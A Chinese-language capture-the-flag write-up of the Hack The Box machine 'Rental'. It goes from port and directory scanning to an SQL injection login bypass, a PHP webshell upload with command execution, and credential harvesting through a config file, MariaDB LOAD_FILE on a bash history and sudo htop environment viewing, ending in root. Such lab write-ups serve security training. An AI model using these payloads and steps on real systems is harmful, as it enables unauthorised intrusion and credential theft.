信息收集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# nmap -sC -sV $(cat ip.txt)
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 19:58 AEST
Nmap scan report for 10.129.96.12
Host is up (0.010s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Mixt
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# dirsearch -u "http://10.129.96.12" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 220545

Output File: /home/h4m5t/Desktop/HTB/Rental/reports/http_10.129.96.12/_24-09-30_00-19-30.txt

Target: http://10.129.96.12/

[00:19:30] Starting: 
[00:19:31] 301 -  312B  - /admin  ->  http://10.129.96.12/admin/            
[00:19:31] 301 -  313B  - /assets  ->  http://10.129.96.12/assets/          
[00:19:31] 301 -  310B  - /css  ->  http://10.129.96.12/css/                
[00:19:31] 301 -  315B  - /database  ->  http://10.129.96.12/database/      
[00:19:32] 301 -  309B  - /js  ->  http://10.129.96.12/js/

SQL注入和文件上传

根据目录爆破的结果,打开登陆页面http://10.129.96.12/admin/login.php,发现存在SQL注入漏洞。

使用“万能密码”登陆即可。

1
payload = {"username":"' OR 1=1 limit 1#","password":"123456"}

在主页打开图片到新页面,发现了保存图片的目录。http://10.129.96.12/admin/assets/uploads/cars_img/

登陆之后可以在左边Cars栏目找到上传点。此系统没有做文件过滤,上传小马,发现可以命令执行。

1
http://10.129.96.12/admin/assets/uploads/cars_img/1727608560_phpshell.php?cmd=id

结果:

1
uid=33(www-data) gid=33(www-data) groups=33(www-data)

之后上传大马,并用nc监听拿到反向shell.

shell

稳定Shell

1
2
3
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo;fg
export TERM=xterm

横向移动

在文件db_connect.php中发现了数据库密码信息。

1
2
3
4
www-data@rental:/var/www/html/admin$ cat db_connect.php 
<?php 

$conn= new mysqli('localhost','manager','password#1','car_rental_db')or die("Could not connect to mysql".mysqli_error($con));

登录数据库,查看用户权限。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@rental:/var/www/html/admin$ mysql -u manager -p'password#1' car_rental_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 217
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [car_rental_db]> SHOW GRANTS FOR 'manager'@'localhost';
+---------------------------------------------------------------------------------------------------------------+
| Grants for manager@localhost                                                                                  |
+---------------------------------------------------------------------------------------------------------------+
| GRANT FILE ON *.* TO `manager`@`localhost` IDENTIFIED BY PASSWORD '*A778F55EAE542DA23ED0F6351B01262EFFD3BBB0' |
| GRANT ALL PRIVILEGES ON `car_rental_db`.* TO `manager`@`localhost`                                            |
+---------------------------------------------------------------------------------------------------------------+
2 rows in set (0.000 sec)

MariaDB [car_rental_db]>

使用FILE权限拿到用户manager的历史命令信息,发现存在密码lastr3s0rt

1
2
3
4
5
6
7
8
9
MariaDB [car_rental_db]> SELECT LOAD_FILE('/home/manager/.bash_history');
+-----------------------------------------------------------+
| LOAD_FILE('/home/manager/.bash_history')                  |
+-----------------------------------------------------------+
| echo -e "Welcome1\nlastr3s0rt\nlastr3s0rt" | passwd
exit
 |
+-----------------------------------------------------------+
1 row in set (0.000 sec)

切换用户su manager,拿到user_flag

提权

sudo -l命令用于列出当前用户可以使用 sudo执行的命令及权限。

1
2
3
4
5
6
7
manager@rental:~$ sudo -l
[sudo] password for manager: 
Matching Defaults entries for manager on rental:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User manager may run the following commands on rental:
    (ALL) /usr/bin/htop

运行htop

1
sudo /usr/bin/htop

选中进程csvexport.sh,按下e编辑和查看环境变量,发现root密码3F^bv=3DVpuCKTL4

顺利拿到root_flag!

root